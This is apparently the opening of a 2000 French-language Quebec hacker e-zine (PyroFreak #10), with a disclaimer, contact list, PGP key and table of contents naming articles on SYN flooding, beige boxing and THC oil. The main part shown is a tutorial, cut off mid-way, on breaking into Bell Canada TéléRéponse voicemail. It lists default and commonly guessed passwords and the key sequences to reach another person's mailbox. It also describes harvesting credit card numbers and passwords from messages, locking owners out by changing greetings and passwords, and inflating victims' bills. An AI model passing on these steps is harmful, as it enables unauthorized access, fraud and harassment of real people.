Copy Link
Add to Bookmark
Report

PyroFreak Magazine Issue 10

eZine's profile picture
Published in 
PyroFreak Magazine
 · 17 Oct 2020
PyroFreak Magazine Issue 10
Pin it

  


'::-::`
(o o)
ooO--(_)--Ooo-
2000(c) tOUT lES dROITS sONT réSERVÉS à pYROfREAk mAGAZINE







-::- Si t'est trop saoul pour marcher!! ben prend ton char!!!!
*Ca cé brillant*


.----..---'`````'.
.` .` `.
\ \ ) ___ __ _ _ _____ ______
\ \ / | |\ | |\| |\ | |\ | |\
\.-'``'-...-'``'-./ | ; | | | | | | | | | ; | |
, , | x | | | ; | | | : | : | : |
: : | ; : | |_: | | | x ; | | x | ;
, , | ___/ \| |___ | | | ___| | |_ ____| |
.; ;. | |\__\.` \__| | ; | |\ __\| \______\|
| ; . ; | |_| | |_| | |_: | ;\
\ -._____/ \_____.- / \_\| \_\| \_\|_| | .10.ten.
: \_x.' \`.x_/ : \_\|
`. (._.) .' xxxxxxx. xxxxxx. xxxxxx. xxxxxxx. xxx. x.
( \ / ) xxx. xxx. xx. xxx. xxx. x. xxx. x.
\ \ ....--. / / xxxxxx. xxxxxx. xxxxxx. xxxxxxx. xxxxx.
.) \ /).---._\ / xxx. xxx. x. xxx. xxx. x. xxx. x.
(. // / xxx. xxx. x. xxx. xxx. x. xxx. x.
) //`--._.--' xxx. xxx. x. xxxxxx. xxx. x. xxx. x.
(``

Crédit: __2

29 Mars 2000


Vous devez lire ceci avant d'aller plus loin:
__________________________________________________________________________
|********************************DISCLAMER********************************|
| |
|Pyrofreakmag (et ses membres) tient à avertir les gens qui vont continuer|
|à lire le texte qui va suivre qu' ont n'est aucunement responsables |
|des actes, et même des pensées qui pourraient être produites par les |
|lecteurs de ce zine par rapport à nos articles . Nous tenons à mettre |
|cela bien au clair. Si vous n'êtes pas d'accord avec cette affirmation, |
|fermez ce texte et effacer le de votre disque dur ou sur tout autres |
|disques. Vous êtes le seul responsable de vos actes. |
|Message s'adressant à la GRC: Si un article est dans l'illégalité, seul |
|son auteur peut-être tenu responsable et non le groupe PYROFREAK en |
|entier. Pas de poursuite, cé ca que ca veux dire simplement! Donc, vener |
|pas nous faire chier!!!! |
| |
|NB: On considère ce magazine comme étant légal, si vous pensez qu'il ne |
|l'est pas, continuer pas à lire ce qui suit! |
| |
| |
|Plusieurs personnes nous on posé cette question: Pourquoi vous faite ce |
|Magazine? Heh bien, j'ai la réponse à vous. C'est seulement pour démon- |
|trer que certains systèmes ou compagnies, sont merdiques par rapport à un|
|sujet en particulier, le but de ce magazine, est seulement de les faire |
|réagir à la situation, pour qu'ils arrangent leur faille le plus rapide- |
|ment possible. Donc, ont est la pour vous aider les compagnies. |
|_________________________________________________________________________|
===========================================================================
Comment nous rejoindre?:

Voici les moyens de rejoindre les membres et COLLABORATEURS (De ce
numéro) de Pyrofreak. Pour avoir la liste complète, aller sur le site web
(www.PyroFreak.org) dans la section membres & cie.

Soit par IRC, sur #PyroFreak, via le serveur undernet.

---------------------------------------------------------------------------
Soit par e-mail:

Pour rejoindre PyroFreak: pyrofreakmag@hotmail.com


Pour rejoindre le WEBMASTER [-DaRK-]: webmaster@pyrofreak.org


Pour rejoindre Neuro: neuro@pyrofreak.org
Pour rejoindre endrix: lordendrix@hotmail.com

Pour rejoindre Cyberrider: cyberride@hotmail.com
Pour rejoindre [ewoks]: ewoks@pyrofreak.org
Pour rejoindre tekrebel: tekrebel@vl.videotron.ca
Pour rejoindre Psykaos: shurikenbest@hotmail.com
Pour rejoindre [G]r4FX: DarkM0nk@rocketmail.com
Pour rejoindre NuCleaR: nuclear@pyrofreak.org
Pour rejoindre Pilate: pilate@pyrofreak.org
Pour rejoindre Oculair: oculair@pyrofreak.org
Pour rejoindre PaToFF: patoff22@hotmail.com
Pour rejoindre LeMarquis: lemarquiz@yahoo.com
Pour rejoindre BenCode: syst3m@pyrofreak.org
Pour rejoindre Karyu: Karyu@pyrofreak.org
Pour rejoindre Vip0|a: vipola@pyrofreak.org

Pour rejoindre Svaik: svaik@biosys.net
Pour rejoindre Cyberdollar: cyberdollar@caramail.com
Pour rejoindre Putois: asmbeginer@multimania.com
Pour rejoindre Mastermind: anakin_vador@hotmail.com
Pour rejoindre KAiAPhAS: goth.goth@caramail.com
Pour rejoindre zorgon: zorgon@sdf.lonestar.org
Pour rejoindre Sabrina: sabrina@inorbit.com

++++++++++++++++++++++++++++

---------------------------------------------------------------------------
Venez visiter notre site web:
- http://www.pyrofreak.org : Le site à été complètemet refait, aller voir ca!

Vous pouvez nous laisser un(e) message/critique ou poser une question sur
notre wwwboard sur le site (Section Contact). GÊNER VOUS PAS, on a pas
l'habitude de rire des gens:)!

Si vous voulez etre informé des changements sur le site de PyroFreak, des
dates de sortie de magazine, etc... Aller vous abonez a la Mailing List de
PyroFreak sur le site, encore dans la section contact.

___________________________________________________________________________
|Si vous voulez qu'un de vos articles paraisse dans le #11, envoyez le à |
|pyrofreakmag@hotmail.com .(Les articles envoyés les en .txt ou .rtf SVP!) |
|SVP, essayer de vous forcez pour les fautes d'orthographe et la mise en |
|page (Pas de retour a la ligne automatique SVP). Ou si vous avez des ques-|
|tions ou commentaires, envoyez les aussi à pyrofreakmag@hotmail.com . |
|__________________________________________________________________________|

Sujets D'articles proposés:
-Logs de scan 1-800 ou autres
-Explication de nouveaux type de Vmb ou Pbx
-Critiques de divers programmes se rapportant a l'underground
-Informations intéressantes sur les cellulaires ou pagettes (Tatoo)
-Informations intéressantes sur un type de fraudage
-Technique de hack particulières
-Anecdote particulière
-Programmation intéressante pour L'underground
-Etc, utilisez votre imagination!


____ __ _ _ _______________ ________ ________ __PyroFreak Magazine #10
:
| TABLE DES MATIERES
'.________ __ __ ___________ ____ ______________ ____ ___ ______ __ __

____________________________________________________________________________
|# Titre de l'article Auteur de l'article |
|___________________________________________________________________________|
|1- Intro | Neuro |
|2- Tutorial Sur les Messageries TéléRéponse de Bell Canada | Neuro |
|3- L'utopie du portscan | LeMarquis |
|4- Le SYN flooding | Endrix |
|5- Certains code régionaux de Bell&Cantel | Endrix |
|6- La GRC introduite par un anonyme | LeMarquis |
|7- Alladvantage | [ewoks] & |
| | Svaik |
|8- Fréquences (The Recueil) | PaToFF |
|8-1 Fréquences plus ou moins légal pour les Francais | Cyberdollar |
|9- Vb5 Tutorial.. | Vip0|a |
|10- Fabrication d'huile de THC | Neuro |
|11- Les secrets d'Eggdrop enfin dévoilés | LeMarquis |
|12- Internet Outdial | LeMarquis |
|13- Beige Boxing - Que se cache t'il sous les plaques | |
| FUCK TELECOM (Pour les Français)| Cyberdollar |
|14- Encryption RSA | Sabrina |
|15- Autres éléments sur l'emetteur télé du #9 | Cyberdollar |
|16- Le PATATOR | Mastermind |
|17- NetAppGuard | KAiAPhAS |
|18- Trashing Report | endrix |
|19- DoS, wtfit (what the fuck is that)? | Tekrebel |
|20- Initiation au C sous linux | Putois |
|21- sCAN pAR eNDRIX | endrix |
|22- Faire chier un trou du cul à la éleet | Tekrebel |
|23- Exploit altavista et Cash bar | Cyberrider |
|24- ISOm \\'aReZ & MP3 (Partie 3) | Vip0|a |
|25- Decryptage des comptes de Cashsurfers | zorgon |
|26- Un peu de tout et de rien mais sourtout de moi | endrix |
|27- Les nouvelles en Vrac | |
|28- Conclusion | Neuro |
|_____________________________________________________________|_____________|
NB:Le mag est corriger de facon a éliminer les fautes d'orthographe
grandioses, donc désoler si y'a des incovénients. (Dépendant des
articles). Raison: Sa gruge beaucoup trop de temps.

**********************************************************************
* Pièces Jointes dans le .zip de ce numéro de PyroFreak *
* *
* Pyrofreak10*.*: Le document que vous lisez en ce moment *
* Exercice1_1.gif: Image, se référer à l'article #9 *
* Exercice1_2.gif: Image, se référer à l'article #9 *
* Exercice1_6.gif: Image, se référer à l'article #9 *
* Exercice1_7.gif: Image, se référer à l'article #9 *
* Exercice1_8.gif: Image, se référer à l'article #9 *
* Image1.gif Image, se référer à l'article #14 *
* Image2.gif Image, se référer à l'article #14 *
* Image3.gif Image, se référer à l'article #14 *
* Image4.gif Image, se référer à l'article #14 *
* pyrobottin.txt: PyroBottin *
* code.pyro: Code Régional du Quebec *
**********************************************************************

____ __ **1er Anniversaire**_ _______ ________ __PyroFreak Magazine #10
:
| 1-Intro
'.________Email: neuro@pyrofreak.org ______________ ____Par Neuro __ __

Salut peuple de la terre.
Comme vous avez peut-être pu le constater,
vous lisez présentement le #10 de PyroFreak. Ce #10 coincide justement
avec notre 1er anniversaire d'existance, depuis le début de notre premier
magazine datant de Février 1999. Donc, si vous nous suivez depuis notre
début, on est très reconnaisant à votre égard, ou même si vous venez juste
de connaître le magazine. Donc, on vous dis un gros MERCI. Un merci aussi
pour les critiques très abondantes de notre dernier numéro (#9). Celui-ci
a été critiqué de façon général comme étant un numéro de qualité, bref nous
allons voir si cela va se répété dans ce numéro. Aussi, désoler pour le
retard de ce numéro, un manque de temps important en est la cause. Pour
terminer, Bonne lecture!





>>-Site Web: www.PyroFreak.org
Toujours Updater tres régulièrement, et surtout que le site à été
complètement refait! ALLER VOUS INSCRIRE A LA Mailing list, dans la
section contact. Il y a aussi le PyroBottin qui s'avère assez populaire,
donc, si vous voulez vous procurer les prochaines versions de celui-ci,
qui est updater très régulièrement, et bien vous pouvez vous le procurer
dans les textes onlines sur le site. J'ai cru bon de joindre la version
la plus récente du PyroBottin dans le .zip de ce numéro, aller y jeter
un coup d'oeil. En passant une version francaise (France) serais très
pratique, pour les intéressés qui se demande quoi faire pour participer
à PyroFreak, voila un bon moyen.


Key PGP pour PyroFreak:
Voici notre key Public:

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: PGPfreeware 6.5.1 for non-commercial use <http://www.pgp.com>

mQGiBDgw03sRBADUCExTODf2IU4T4aC4FzlT3NysmGX4RsuhcFrP6H2jkSd08jXa
HwMQIBqFPRdSsHcNiypeOm/69okv9qCG6TpCvLQZ24GnlSIwsgYAH9sJ+ONnDD9b
XHGbkVTMQZTxXbr//pbWOtHTQuHF0xp9u1Q4G6ulxSAKUNdKqrJBL7v62QCg/ycI
lllyi2hxvucdG5o03BA02CEEAJ5xfuRZA2MVPN+9oO5blMwXO+0rmoiK14maFgVy
7LB4hg1leOQFf2Nq3FpcrgrkxCvG47panSLTVQaEPZsmk5S5SpDhPxhzR+Hn4bBy
/+va5/NWNEb2DCr7M8NN75Kel7PtGGCKJm6wOzI72N01Trw4rKM5OqCbXoe4YcPO
9DtiBAC8b29F5wUT+Zt0qfPiyhTOMftf7AnclDMYDIk8UoqV0a6GLaDHpjilOjif
1otqX5JARYfCYb8bbwvfFFAz/yqPNX5xpzFChD5QKciZ+IbXdYHi3S1rh0vMgLTp
GwqL1aoNcW06cBK3/TdPwNTZaMxmW7zMEYLoKH/h7yDpXIa3erQtUHlyb2ZyZWFr
IE1hZ2F6aW5lIDxweXJvZnJlYWttYWdAaG90bWFpbC5jb20+iQBMBBARAgAMBQI4
MNN7AgsCAhkBAAoJEJVPLe3+WRwP15IAn1o1cstpxi5uAFk1UQ8PmzvvokZfAKD7
S1ZzoBO/fFf5QIPEY2+b3xTPzrkCDQQ4MNN8EAgA9kJXtwh/CBdyorrWqULzBej5
UxE5T7bxbrlLOCDaAadWoxTpj0BV89AHxstDqZSt90xkhkn4DIO9ZekX1KHTUPj1
WV/cdlJPPT2N286Z4VeSWc39uK50T8X8dryDxUcwYc58yWb/Ffm7/ZFexwGq01ue
jaClcjrUGvC/RgBYK+X0iP1YTknbzSC0neSRBzZrM2w4DUUdD3yIsxx8Wy2O9vPJ
I8BD8KVbGI2Ou1WMuF040zT9fBdXQ6MdGGzeMyEstSr/POGxKUAYEY18hKcKctaG
xAMZyAcpesqVDNmWn6vQClCbAkbTCD1mpF1Bn5x8vYlLIhkmuquiXsNV6TILOwAC
AggA3CvCaWUTeC9zxao9AoDJJfzUKLhib4nNR1C0+MNTDGeKKKLSQQLOobQKk4Ao
Pr3Jqe/19p2aJYUu9Ma7r5GwK4hiH4sIGMlDJUprD7Nvr7/5WiKX7IQ+NNMk09RJ
TvFp+b5N5t5rQjGUfkRbWrIZcGLpo+qpL4NNimYG1MbTVqEb4GRSZXz0shY9sWu+
W3g/OuSXcIOXxJiXTmICmXIDOWRdACxngF1FBT802wBEOIu/VR9j6DtVpL8+vx+3
tPI6/Spy+ZadRD4+5hComuXTNzUiI0mcvG2WTqcOAJyuvRFm3ky7xzO6MWlie+Zg
hBDENiqy6zRrWYN6mu1NZHZaWYkARgQYEQIABgUCODDTfAAKCRCVTy3t/lkcDx7v
AJ45rAXK/NeWmwezmE+CGMEZYzJoxQCgsOgyc66kWIRJ2K/WIGgOIq4M3wo=
=QSdb
-----END PGP PUBLIC KEY BLOCK-----


News pour PyroFreak #10 -- Les médias sont fous!

Note de Neuro: Le monde m'ont trouvé "sans scrupule" d'accorder un entrevu
au Journal de Montréal et a L'émmission de TV Branché, et
bien vous aviez raison, je suis con et j'ai eu tord!


Linux Slackware 7 bug report Par Endrix
============================
Il y a un problème dans le pppd de linux slackware 7. Sur beaucoup
de machine, il n'est pas fonctionnant alors vous devez aller downloader
un fix sur le serveur ftp.cdrom.com
(ftp://ftp.cdrom.com/pub/linux/slackware-7.0/slakware/n7/tcpip2.tgz)

Merci!
fbasoft@yahoo.com

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++++++++++++++++++++++++++++Annonces et Offres+++++++++++++++++++++++++++++
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++


Si vous distribuez notre magazine sur votre site, ou si vous avez un
lien vers notre site, faîte nous le savoir par e-mail:
pyrofreakmag@hotmail.com
Ca va nous faire un grand plaisir d'annoncer votre site (Si celui en vaut le
coup) dans le prochain numéro de PyroFreak ou sur notre site, qui surement
fera monter le nombre de visiteurs sur votre site.
NB: J'ai bien dis si le site en vaut le coup.

Cours sur notre Channel Irc #PyroFreak (Undernet)
J'aimerais souligné que durant le prochain mois, plusieurs cours vont
etre donnés sur notre channel IRC, dont soyez y! Ils vont être annoncés dans
le topic du chanel.

On recherche des gens qui serais intéressés à donner un ou plusieurs
cours sur notre channel, d'un sujet divers traitant de l'underground. Que
ca soit un cours pour montrer une technique de fumage de weed, ou une tech-
nique sur le "piratage" téléphonique, peu importe, autant que ca soit pas
trop du déja vu. Si ya des intéressés, venez nous visiter sur notre channel
IRC , #PyroFreak ! (Autant Francais que Quebecois).

PyroFreak recherche de bons codeurs, soit en Win ou en Linux/Unix, donc
si vous êtes intéressé à vous impliquez dans PyroFreak, et que vous avez
de bonnes connaisances en programmation, contacter nous a:
pyrofreakmag@hotmail.com
Et on vous donnera plus d'informations sur le sujet.


On recherche aussi quelqu'un qui pourrais nous trouver de bons arti-
cles de journaux récents, si vous voulez un exemple de ce que nous parlons,
aller lire la section Nouvelles en vrac a la fin de ce magazine.
PyroFreakmag@hotmail.com


___________________________________________________________________________
___________________________________________________________________________
|Si vous voulez qu'un de vos articles paraisse dans le #11, envoyez le à |
|pyrofreakmag@hotmail.com . Ou si vous avez des questions ou commentaires, |
|envoyez les aussi a pyrofreakmag@hotmail.com . |
|__________________________________________________________________________|
+-------------------------+ , , , , , , , ,
|+-----------------------+| , , , , , , ,
||+---------------------+||, .____. , , , , , , ,
|||| |||| , | :| , , , ,
|||| J'en ai plein |||| __|====|__ |||||| , , , ,
|||| mon cul de ||||* / o o \ ||||||, , , , ,
|||| cette cris |||| * | -= | \====/ , , , , ,
|||| de saison |||| _U==\__//__. \\// +---------------------+
|||| de cul ||||/ / \\==// \ \ || , |+-------------------+|
|||| |||| | o || | \|| ,|| !!! PyroFreak !!! ||
|||| ||||/| o "" |\_|B), |+-------------------+|
|||| CALIS D'HIVERS ||||, \__ --__/ || , +---------------------+
||+---------------------+|| / \ ||, , , , , , ,
|+-----------------------+|| | || , , , , , ,
+-------------------------+| | || , , , , , , ,
------_____---------____---\__________/__||__---------________PsYkAoS


____ __ **1er Anniversaire**_ _______ ________ __PyroFreak Magazine #10
| 2-Tutorial Sur les Messageries TéléRéponse de Bell Canada
|(X) Phreak ( ) Hack ( ) Autres
'.__________Par Neuro________ ________ neuro@pyrofreak.org ______ ___


Bonjour,
le texte qui va suivre sera utile particulièrement aux Québecois,
mais celui-ci peut quand même être utile pour toute personnes habitant
l'Amérique Du Nord (Voir plus bas pour plus d'info). Ce document s'adresse
autant pour les débutants en matière de Phreak que tout autres personnes
ayant de la connaisance dans le domaine. J'ai essayer de faire un document
le plus complet possible sur le service TéléRéponse, à vous de voir si c'est
réussi.

Avant de continuer à lire ce document, vous devez lire ceci:

_--AVERTISSEMENT--_

Je tiens à avertir les gens qui vont continuer à lire ce texte, Que je suis
en aucun cas, responsable des actes, et même des pensées qui pourraient être
produites par les lecteurs de ce texte. Je tiens à mettre cela bien au clair.
Si vous n'êtes pas d'accord avec cette affirmation arrêter de lire ce docu-
ment dès maintenant et effacer le de votre disque dur ou sur tout autres
disques. Vous êtes le seul responsable de vos actes. Prener çe texte comme
étant seulement à but théorique.



*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*
*+ 1- Informations générales sur le service TéléRéponse de Bell Canada. +*
*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*

Voici la publicité que Bell Canada fait de son service de TéléRéponse:

-Ne manquez plus un seul appel. Le service TéléRéponse prend vos messages
quand vous utilisez votre téléphone ou Internet ou si vous êtes éloigné
du téléphone.

-Ce service prend jusqu'à trois messages en même temps.

-Il est invisible. Vous n'avez plus à vous occuper des bandes ou des
câbles. Et il ne prend pas de place.

-Il est fiable. Le service TéléRéponse continue de fonctionner, même en
cas de panne d'électricité. Il enregistre aussi l'heure et la date de
chaque message.

-Il est pratique. Récupérez et gérez vos messages depuis tout téléphone
à clavier, 24 heures sur 24.

-Conserver jusqu'à 25 messages.

-Recevoir des messages atteignant 3 minutes et de les sauvegarder pendant
7 jours.

-Accueillir les appelants avec un message de 30 secondes (Greeting).

-Sauvegarder les messages non écoutés pendant 21 jours.

-Le service TéléRéponse Requière Oubligatoirement un service Touch-Tone.

********************************
*** Paiement à l'utilisation ***
*************************************************************************
**-Envoyer un message à un groupe : jusqu'à 5 listes de 15 numéros. **
** **
**-Envoyer des messages à d'autres abonnés des services TéléRéponse ou **
** TéléRéponse Plus, sans que leur téléphone sonne. **
** **
**-Envoyer 5 messages jusqu'à 30 jours d'avance. **
** **
**-Envoyez des messages à n'importe qui, n'importe quand, n'importe où!**
** **
** La Messagerie Universelle est un service payable à l'utilisation. **
** Des frais sont exigibles pour chaque message que vous envoyez, **
** faites suivre ou auquel vous répondez: **
** **
** -0,15$ par message au Québec **
** -0,40$ par message à l'extérieur du Québec (à l'interieur du Canada)**
** -1,50$ par message aux États-Unis **
** -2,50$ par message Outre-mer **
*************************************************************************
*****************************
* Abonnement Supplémentaire *
*****************************

Centre de messages intégré

-Regroupez tous vos téléphones dans une seule boîte vocale. Vous pouvez
relier les téléphones de votre domicile ou de votre bureau, ainsi que
votre téléphone cellulaire Bell MobilitéMC à une seule boîte vocale :
vous n'aurez ainsi plus qu'un seul mot de passe, un seul message d'ac-
cueil et un seul point de vérification des messages.

Option Téléavertisseur

-Avez-vous un téléavertisseur? Votre boîte vocale peut appeler automati-
quement votre téléavertisseur quand vous avez des nouveaux messages.

Aide pour le service TéléRéponse: 1-800-361-9844



*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*
*+ 2- Utilités de ce système pour nous les Phreakers. +*
*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*

Évidemment qui à une et même plusieurs utilités à hacker
ce type de système, sinon j'aurais pas écrit ce tutorial.


*+Première Utilité+*

L'utilité qui va suivre peut jouer un rôle très important lorsque
vous voulez avoir de l'information sur quelqu'un ou sur une entreprise en
particulier. Je vois plus un intéret pour un entreprise, mais bon, les 2
peuvent quand même être utilent.

Voici des exemples de types de messages qu'on peut retrouver sur un système
de TéléRéponse d'entreprise.

-George, Ici Carole, je voulais juste te dire que j'ai
déposé les 200$ comme prévu dans votre boîte à mail à
côter de votre porte pour les employés, rappel moi au
XXX-XXXX pour confirmer si ta bien reçu le montant.

-George, Ici Carole, voici mon numéro de carte de crédit:
4551XXXXXXXXXXXX XX/XX . Avec cela tu va pouvoir passer
la commande que je désirais plus tot, vu que je pars en
voyage aujourd'hui et que vous êtes fermé.

-George, Ici Carole, je voulais juste te dire que j'ai
trouvé une super aubaine pour les sifflets rose au 456
rue Des Érables.

-George, Ici Carole, j'ai trés hâte qu'on baise comme des
bêtes, je t'aime. À demain.

-George, Ici Carole, je voulais juste te dire que j'ai
changer la combinaison de l'entrer de l'usine, le nouveau
est XX-XX-XX. Salut. (Ça pourais biensûr être un nouveau
mot de passe du réseau informatique de l'entreprise)

-George, Ici Carole, je voulais te dire que le site Web
de la compagnie est complété. Donc, si tu veux rajouter
de l'informations par toi-même, voici les informations
nécessaires: Host: XXXXXXXXXX Login: XXXXX Pass: XXXXX
Salut.

--George, Ici Carole, je voulais te dire que si tu désire
faire des appels intérurbains, bien voici le numéro (PBX)
à composer avant ceux-ci: XXXXXXXXXXXXXXX

Pour ceux qui doute qu'on peut entendre des messages comme ceux-ci
, vous resteriez très très surpris. Même que plusieurs exemples la dedans
me sont déja arrivé personnelement. Donc, ça peut être très utile d'avoir
accès à la Boîte Vocale pour ce type d'informations.

Evidemment les Boîtes Vocales de résidence sont beaucoup moins
intéressantes. C'est pourquoi que je doute que ca soit intéressant de
les hacker pour espérer avoir de bonnes informations, à moins biensûr
que ça soit la résidence d'un Président d'une compagnie, ou quelque
chose comme ca.


*+Deuxième Utilité+*

L'utilité qui va suivre est plus ou moins intéressante. Il s'agit
de faire chier le propriétaire de la Boîte Vocale et du même coup, faire
chier Bell. Je vous explique le principe avec une petite exemple.

Vous connaissez un magasin ou il vend des pièces d'ordinateurs
beaucoup plus cher que le prix habituel, et cela vous chôque. Donc c'est
pourquoi que vous avez envis de revendiquer cela. C'est alors que vous
décidez de hacker (Voir plus bas dans ce texte pour avoir le coté pratique)
la Boîte Vocale de la compagnie en question. Cela, en changeant le message
d'intro de la Boîte Vocale. Quand je parle de message d'intro (Greeting),
je parle du message que vous entendez lorsque vous appeler sur un répondeur
qui est souvent du type: "Bonjour, Johanne et Solange sont pas la pour le
moment, laisser votre message après le son du timbre sonore.". Donc, quand
vous le changer, vous pouvez en profiter pour faire passer un message du
style:

-Aller magasiner au commerce X à place de celui-ci, si vous voulez
avoir de meileurs prix. Tel: XXX-XXXX Adresse: XXX Xxxxxxx.

-Vous vous faîte crosser à acheter dans le commerce que vous appelez
en ce moment.

Pour changer le message d'intro une fois rendu dans le menu principal,
tapper les chiffres suivants en ordre:( 4-3-1 ) Il ne vous reste plus qu'à
suivre les instructions.

Bref, vous voyez le type de message que je parle. Bon deu-
xièment, pour que vôtre message d'intro reste le plus longtemps pos-
sible, vous devez aussi changer le mot de passe de la Boîte Vocale.
Donc, pour que le propriétaire peuvent reavoir accès à ca Boîte Vo-
cale, il devra appeler Bell, pour que ceux-ci remette à zero ça Boîte
Vocale. Donc, en remettant à zéro la Boîte Vocale, le propriétaire
de celle-ci perd tous les messages qui pouvaient avoir sur celle-ci.
Autant les archivés que les nouveaux messages. Donc, ca peux le faire
vraiment chier.

Pour changer le mot de passe une fois rendu dans le menu principal,
tapper les chiffres suivants en ordre:( 4-2-1 ) Il ne vous reste plus qu'à
suivre les instructions.

Troisième chose à faire, mais qui n'est pas nécessaire, est de
changer le nom de l'usager de la box. Pourquoi? Et bien je vous explique
cela. Quand le propriétaire de la Boîte Vocale va se rendre compte que
son message d'intro à été modifier de façon à lui faire perdre de l'argent
ou à lui nuire, il va se grouiller le cul pour aller le remodifier.
Donc, quand il va faire '*98' de son téléphone pour accéder à ça Boîte Vocale
et que ca va dire exemple : Bonjour "Mr. Du con", entrer votre mot de passe.
Quand ca va faire 3 echecs infructueux, y va virer fou en cris avec Mr. Du
con.


Pour changer le nom d'usagé une fois rendu dans le menu principal,
tapper les chiffres suivants en ordre:( 4-3-2 ) Il ne vous reste plus qu'à
suivre les instructions.




*+Troisième Utilité+*

Il s'agit de faire chier une personne en particulier, ou une entre-
prise de façon à faire monter ca facture à la fin du mois. Vous allez me dire
comment?. Heh bien, rien de plus simple. Je sais pas si vous avez remarquer
qu'au début de ce tutorial l'entête *Paiement à l'utilisation*. Donc, si vous
passer 15 messages outre-mer à 2,50$ chacun, ca commence a faire pas mal chier.
Mais biensûr, si vous exagérer sur le montant, Bell va se douter que la personne
dit la vérité quand elle dit qu'elle n'a pas fais ces Frais. Donc soyez tout
de même résonnable.



*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*
*+ 3- Comment hacker le systeme TéléRéponse de Bell Canada +*
*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*


3-a)*-*Comment accéder au service TéléRéponse: *-*

*-A partir de votre domicile:

1-Composez *98
2-Vous entendrez votre nom ou numéro préenregistré
3-Composez votre mot de passe


*-A partir de l'extérieur vers la Boîte Vocale du Numéro Composé

1-Composez votre numéro de téléphone
2-Appuyer sur 9 des le début de votre message d'accueil
5-Composez votre mot de passe suivi du #


*-A partir de l'extérieur vers n'importe quel Boîte Vocale Téléréponse, il
faut juste accéder au message d'accueil d'une Boîte Vocale TéléRéponse.

1-Composez votre numéro de téléphone
2-appuyer sur * des le début de votre message d'accueil
3-Ensuite 1 pour Francais ou 2 pour Anglais
4-Appuyer sur #
5-Composer le numéro de téléphone ou la Boîte Vocale se situe avec
le code régional (XXX-XXX-XXXX)
5-Composez votre mot de passe suivi du #


***********************
***************
*********



3-b)*-*Mot de passe par défaut*-*


Lorsque vous activez une Messagerie Téléréponse de Bell Canada.
Celle-ci est assigné par un mot de passe par défaut, qui est du même type
sur tout les TéléRéponse à leur démarage.

Exemple:

Le numéro de téléphone ou le service de TéléRéponse est installé est:
1-514-254-6767 , et bien le password dans ce cas-ci sera: 2546767
Donc, pour les gens un peu moins vite, voici un deuxième exemple:)
Tel: 1-819-435-4832 Mot de passe: 4354832
C'est pas plus compliqué que ca.


Passons maintenant à un étape trés importante, il s'agit des
mots de passe par défaut les plus utilisés. Parce que, comme vous vous en
doutez surement, c'est assez rare que l'usager de la Boîte Vocale laisse
le meme password qu'à l'origine, vu que Bell les incitent à changer le
mot de passe quand il accède pour la première fois à leur Boîte Vocale.
Donc voici les mots de passe par défaut, qui sont comme étant très très
populaire. J'estime qu'avec ceux-ci vous pouvez hacker 30-40% des systèmes
(En ce jour du 6 Janvier 2000), parce qu'après la sortie de ce texte,
Bell va surement esssayer de contrer le probleme en incitant d'avantage
sur un mot de passe plus sécuritaire. Donc voici les mots de passe à
essayer en ordre.

Exemple: Le numéro de téléphone de la Boîte Vocale est: 1-514-329-4363

Password Par défaut:
4363
3294363
1234
94363
12345
01234
0000
9999
5143294363


Les mots de passe doivent être situé entre 4 et 15 chiffres pour le
service TéléRéponse.

Après 3 tentatives d'accès au service TéléRéponse infructueux, le service
te déconnecte.

Ce qui est bien avec le service TéléRéponse, c'est que si vous avec 3 echecs
de suite avec le mot de passe, et bien l'opérateur ne le sera jamais. C'est
pas comme les systemes (Audix, Message Center et cie) qui après 3 echecs pour
trouver le bon mot de passe, envois un message a l'opérateur dans sa Boîte
Vocale lui disant que la Boîte Vocale à eu 3 tentatives de Mot de Passe
invalide.

***********************
***************
*********


3-c)*-*Les Étapes pour accéder au menu à partir d'une autre Boîte Vocale*-*

-Vous composez le numéro de téléphone qui à une Boîte Vocale TéléRéponse,
mais pas nécessairement celle que vous voulez hacker.

-Attender que le message d'intro débute, et appuyer sur *

"Bienvenue au service TéléRéponse de Bell Canada"
"Si vous désirez des instructions vocale en français, veuiller appuyer
sur 1.."

-Appuyer sur 1

"Si vous disposer d'une boîte vocale dans ce systeme, appuyer sur le #
et composer votre numéro de téléphone, précédé de l'indicatif régional
ou encore, composer à nouveau les 10 chiffres du # de la personne que vous
désirer appeler"

-Appuyer sur #

"Le numéro de la Boîte Vocale svp"

-Composer le numéro de téléphone avec le code régional de la Boîte Vocale à
hacker.

"Veuiller composer votre mot de passe"

-Composer le mot de passe suivi du #

***À ce point, vous avez accès au Menu***


***********************
***************
*********


3-d)*-*Les Étapes pour accéder au menu d'une Boîte Vocale à partir de son
numéro d'origine*-*

-Vous composez le numéro de téléphone qui à la Boîte Vocale à hacker

-Attender que le message d'intro débute, et appuyer sur 9

"Veuiller composer votre mot de passe"

-Composer le mot de passe suivi du #

***À ce point, vous avez accès au Menu***


3-e)*-*Vous trouvez un message intéressant sur la Boîte Vocale hacker,
et vous voulez savoir d'ou il provient*-*

Si vous trouvez un message sur la Boîte Vocale hacker, et que celui-ci
vous semble intéressant, et vous aimeriez savoir de quel numéro il provient.
Heh bien, rien de plus simple si la personne qui à envoyé le message n'a pas
utilisé le service confidentiel (*67). Écouter le message en question, et
ensuite tapper 8 (Pour y répondre), à ce point la, la voix robotisé du
système va vous donnez la provenance de l'appel.


*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*
*+ 4- Comment faire pour hacker une Boîte Vocale TéléRéponse même quand +*
*+ son propriétaire est présent? +*
*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*

